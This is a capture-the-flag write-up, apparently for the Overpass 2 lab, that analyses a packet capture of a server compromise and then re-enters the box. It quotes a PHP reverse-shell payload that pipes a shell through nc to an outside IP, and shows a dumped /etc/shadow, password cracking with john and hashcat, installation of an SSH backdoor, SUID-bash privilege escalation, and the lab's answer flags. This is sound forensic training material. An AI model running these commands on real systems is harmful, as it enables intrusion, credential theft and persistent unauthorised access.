Overpassed2 pcap

***wireshark*** What was the URL of the page they used to upload a reverse shell? using http filter -> /development/ What payload did the attacker use to gain access? follow tcp stream ^ stream 1 -> <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> ***follwing tcp stream ^ 3*** /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh ls -lAh total 8.0K -rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass -rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass cat .overpass ,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james su james Password: whenevernoteartinstant james@overpass-production:/var/www/html/development/uploads$ cd ~ cd ~ james@overpass-production:~$ sudo -l] sudo -l] sudo: invalid option -- ']' usage: sudo -h | -K | -k | -V usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user] usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command] usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>] usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ... james@overpass-production:~$ sudo -l sudo -l [sudo] password for james: whenevernoteartinstant Matching Defaults entries for james on overpass-production: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User james may run the following commands on overpass-production: (ALL : ALL) ALL james@overpass-production:~$ sudo cat /etc/shadow sudo cat /etc/shadow root:*:18295:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: sshd:*:18464:0:99999:7::: james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::: james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor <git clone https://github.com/NinjaJc01/ssh-backdoor Cloning into 'ssh-backdoor'... remote: Enumerating objects: 18, done. remote: Counting objects: 5% (1/18) remote: Counting objects: 11% (2/18) remote: Counting objects: 16% (3/18) remote: Counting objects: 22% (4/18) remote: Counting objects: 27% (5/18) remote: Counting objects: 33% (6/18) remote: Counting objects: 38% (7/18) remote: Counting objects: 44% (8/18) remote: Counting objects: 50% (9/18) remote: Counting objects: 55% (10/18) remote: Counting objects: 61% (11/18) remote: Counting objects: 66% (12/18) remote: Counting objects: 72% (13/18) remote: Counting objects: 77% (14/18) remote: Counting objects: 83% (15/18) remote: Counting objects: 88% (16/18) remote: Counting objects: 94% (17/18) remote: Counting objects: 100% (18/18) remote: Counting objects: 100% (18/18), done. remote: Compressing objects: 6% (1/15) remote: Compressing objects: 13% (2/15) remote: Compressing objects: 20% (3/15) remote: Compressing objects: 26% (4/15) remote: Compressing objects: 33% (5/15) remote: Compressing objects: 40% (6/15) remote: Compressing objects: 46% (7/15) remote: Compressing objects: 53% (8/15) remote: Compressing objects: 60% (9/15) remote: Compressing objects: 66% (10/15) remote: Compressing objects: 73% (11/15) remote: Compressing objects: 80% (12/15) remote: Compressing objects: 86% (13/15) remote: Compressing objects: 93% (14/15) remote: Compressing objects: 100% (15/15) remote: Compressing objects: 100% (15/15), done. Unpacking objects: 5% (1/18) Unpacking objects: 11% (2/18) Unpacking objects: 16% (3/18) Unpacking objects: 22% (4/18) Unpacking objects: 27% (5/18) Unpacking objects: 33% (6/18) Unpacking objects: 38% (7/18) remote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0 Unpacking objects: 44% (8/18) Unpacking objects: 50% (9/18) Unpacking objects: 55% (10/18) Unpacking objects: 61% (11/18) Unpacking objects: 66% (12/18) Unpacking objects: 72% (13/18) Unpacking objects: 77% (14/18) Unpacking objects: 83% (15/18) Unpacking objects: 88% (16/18) Unpacking objects: 94% (17/18) Unpacking objects: 100% (18/18) Unpacking objects: 100% (18/18), done. james@overpass-production:~$ cd ssh-backdoor cd ssh-backdoor james@overpass-production:~/ssh-backdoor$ ssh-keygen ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/james/.ssh/id_rsa): id_rsa id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in id_rsa. Your public key has been saved in id_rsa.pub. The key fingerprint is: SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58 james@overpass-production The key's randomart image is: +---[RSA 2048]----+ | .. . | | . + | | o .=. | | . o o+. | | + S +. | | =.o %. | | ..*.% =. | | .+.X+*.+ | | .oo=++=Eo. | +----[SHA256]-----+ james@overpass-production:~/ssh-backdoor$ chmod +x backdoor chmod +x backdoor james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed <9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed SSH - 2020/07/21 20:36:56 Started SSH backdoor on 0.0.0.0:2222 What password did the attacker use to privesc? -> whenevernoteartinstant How did the attacker establish persistence? -> git clone https://github.com/NinjaJc01/ssh-backdoor Using the fasttrack wordlist, how many of the system passwords were crackable? -> 4 save the shadow to crack with fastcrack.txt nano shadow.txt root:*:18295:0:99999:7::: daemon:*:18295:0:99999:7::: bin:*:18295:0:99999:7::: sys:*:18295:0:99999:7::: sync:*:18295:0:99999:7::: games:*:18295:0:99999:7::: man:*:18295:0:99999:7::: lp:*:18295:0:99999:7::: mail:*:18295:0:99999:7::: news:*:18295:0:99999:7::: uucp:*:18295:0:99999:7::: proxy:*:18295:0:99999:7::: www-data:*:18295:0:99999:7::: backup:*:18295:0:99999:7::: list:*:18295:0:99999:7::: irc:*:18295:0:99999:7::: gnats:*:18295:0:99999:7::: nobody:*:18295:0:99999:7::: systemd-network:*:18295:0:99999:7::: systemd-resolve:*:18295:0:99999:7::: syslog:*:18295:0:99999:7::: messagebus:*:18295:0:99999:7::: _apt:*:18295:0:99999:7::: lxd:*:18295:0:99999:7::: uuidd:*:18295:0:99999:7::: dnsmasq:*:18295:0:99999:7::: landscape:*:18295:0:99999:7::: pollinate:*:18295:0:99999:7::: sshd:*:18464:0:99999:7::: james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7::: paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7::: szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7::: bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7::: muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7::: ┌──(kali㉿kali)-[~/Downloads] └─$ john --wordlist=/usr/share/wordlists/fasttrack.txt shadow.txt Using default input encoding: UTF-8 Loaded 5 password hashes with 5 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status secret12 (bee) abcd123 (szymex) 2g 0:00:00:01 DONE (2022-07-28 15:52) 1.941g/s 0p/s 646.6c/s 646.6C/s Spring2017..starwars 1qaz2wsx (muirland) secuirty3 (paradox) 4g 0:00:00:01 DONE (2022-07-28 15:52) 2.547g/s 141.4p/s 707.0c/s 707.0C/s Spring2017..starwars Use the "--show" option to display all of the cracked passwords reliably Session completed. What's the default hash for the backdoor? -> bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3 ┌──(kali㉿kali)-[~/Downloads/backdoors] └─$ wget https://github.com/NinjaJc01/ssh-backdoor/raw/master/backdoor --2022-07-28 15:56:32-- https://github.com/NinjaJc01/ssh-backdoor/raw/master/backdoor Resolving github.com (github.com)... 140.82.113.3 Connecting to github.com (github.com)|140.82.113.3|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/backdoor [following] --2022-07-28 15:56:33-- https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/backdoor Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.111.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 6634961 (6.3M) [application/octet-stream] Saving to: ‘backdoor’ backdoor 100%[======================>] 6.33M 7.68MB/s in 0.8s 2022-07-28 15:56:35 (7.68 MB/s) - ‘backdoor’ saved [6634961/6634961] ┌──(kali㉿kali)-[~/Downloads/backdoors] └─$ ls 1st 2nd 3rd 4th 5th backdoor birth shell.php ┌──(kali㉿kali)-[~/Downloads/backdoors] └─$ chmod +x backdoor ┌──(kali㉿kali)-[~/Downloads/backdoors] └─$ ./backdoor --help backdoor Flags: --version Displays the program version string. -h --help Displays help with available flag, subcommand, and positional value parameters. -p --port Local port to listen for SSH on (default: 2222) -i --interface IP address for the interface to listen on (default: 0.0.0.0) -k --key Path to private key for SSH server (default: id_rsa) -f --fingerprint SSH Fingerprint, excluding the SSH-2.0- prefix (default: OpenSSH_8.2p1 Debian-4) -a --hash Hash for backdoor (default: bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3) What's the hardcoded salt for the backdoor? -> 1c362db832f3f864c8c2fe05f2002a05 found in https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/main.go func passwordHandler(_ ssh.Context, password string) bool { return verifyPass(hash, "1c362db832f3f864c8c2fe05f2002a05", password) } What was the hash that the attacker used? - go back to the PCAP for this! -> november16 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed Crack the hash using rockyou and a cracking tool of your choice. What's the password? -> func hashPassword(password string, salt string) string { hash := sha512.Sum512([]byte(password + salt)) return fmt.Sprintf("%x", hash) } The salt (remember that the salt is hardcoded) is appended to the password, and SHA512 of the resulting string makes the hash. To summarize, we have: SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed' Now, let’s crack it with hashcat (we’ll use the mode 1710, which corresponds to sha512($pass.$salt)): $ cat hash.txt 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05 $ hashcat --force -m 1710 -a 0 hash.txt /usr/share/wordlists/rockyou.txt hashcat (v5.1.0) starting... OpenCL Platform #1: The pocl project ==================================== * Device #1: pthread-Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz, 1024/3144 MB allocatable, 2MCU Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Early-Skip * Not-Iterated * Single-Hash * Single-Salt * Raw-Hash * Uses-64-Bit Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256 ATTENTION! Pure (unoptimized) OpenCL kernels selected. This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance. If you want to switch to optimized OpenCL kernels, append -O to your commandline. Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled. * Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=14 -D DGST_R1=15 -D DGST_R2=6 -D DGST_R3=7 -D DGST_ELEM=16 -D KERN_TYPE=1710 -D _unroll' * Device #1: Kernel m01710_a0-pure.dcb403f5.kernel not found in cache! Building may take a while... Dictionary cache hit: * Filename..: /usr/share/wordlists/rockyou.txt * Passwords.: 14344385 * Bytes.....: 139921507 * Keyspace..: 14344385 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:november16 Session..........: hashcat Status...........: Cracked Hash.Type........: sha512($pass.$salt) Hash.Target......: 6d05358f090eea56a238af02e47d44ee5489d234810ef624028...002a05 Time.Started.....: Sun Aug 16 18:44:00 2020 (2 secs) Time.Estimated...: Sun Aug 16 18:44:02 2020 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 149.3 kH/s (0.50ms) @ Accel:1024 Loops:1 Thr:1 Vec:4 Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.........: 18432/14344385 (0.13%) Rejected.........: 0/18432 (0.00%) Restore.Point....: 16384/14344385 (0.11%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: christal -> tanika Started: Sun Aug 16 18:43:44 2020 Stopped: Sun Aug 16 18:44:03 2020 The attacker defaced the website. What message did they leave as a heading? -> H4ck3d by CooctusClan What's the user flag? -> ┌──(kali㉿kali)-[~/Downloads/backdoors] └─$ ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.216.199 -p 2222 The authenticity of host '[10.10.216.199]:2222 ([10.10.216.199]:2222)' can't be established. RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.216.199]:2222' (RSA) to the list of known hosts. james@10.10.216.199's password: To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. james@overpass-production:/home/james/ssh-backdoor$ james@overpass-production:/home/james/ssh-backdoor$ ls README.md backdoor.service cooctus.png id_rsa.pub main.go backdoor build.sh id_rsa index.html setup.sh james@overpass-production:/home/james/ssh-backdoor$ cd .. james@overpass-production:/home/james$ ls ssh-backdoor user.txt www james@overpass-production:/home/james$ cat user.txt thm{d119b4fa8c497ddb0525f7ad200e6567} james@overpass-production:/home/james$ ls -la total 1136 drwxr-xr-x 7 james james 4096 Jul 22 2020 . drwxr-xr-x 7 root root 4096 Jul 21 2020 .. lrwxrwxrwx 1 james james 9 Jul 21 2020 .bash_history -> /dev/null -rw-r--r-- 1 james james 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 james james 3771 Apr 4 2018 .bashrc drwx------ 2 james james 4096 Jul 21 2020 .cache drwx------ 3 james james 4096 Jul 21 2020 .gnupg drwxrwxr-x 3 james james 4096 Jul 22 2020 .local -rw------- 1 james james 51 Jul 21 2020 .overpass -rw-r--r-- 1 james james 807 Apr 4 2018 .profile -rw-r--r-- 1 james james 0 Jul 21 2020 .sudo_as_admin_successful -rwsr-sr-x 1 root root 1113504 Jul 22 2020 .suid_bash drwxrwxr-x 3 james james 4096 Jul 22 2020 ssh-backdoor -rw-rw-r-- 1 james james 38 Jul 22 2020 user.txt drwxrwxr-x 7 james james 4096 Jul 21 2020 www james@overpass-production:/home/james$ ./.suid_bash .suid_bash-4.4$ ls ssh-backdoor user.txt www .suid_bash-4.4$ cd root .suid_bash: cd: root: No such file or directory .suid_bash-4.4$ cd /root .suid_bash: cd: /root: Permission denied .suid_bash-4.4$ cat /root/root.txt cat: /root/root.txt: Permission denied .suid_bash-4.4$ ^C .suid_bash-4.4$ bash To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details. james@overpass-production:/home/james$ ./.suid_bash -p .suid_bash-4.4# cat /root/root.txt thm{d53b2684f169360bb9606c333873144d} .suid_bash-4.4#

[[Magician]]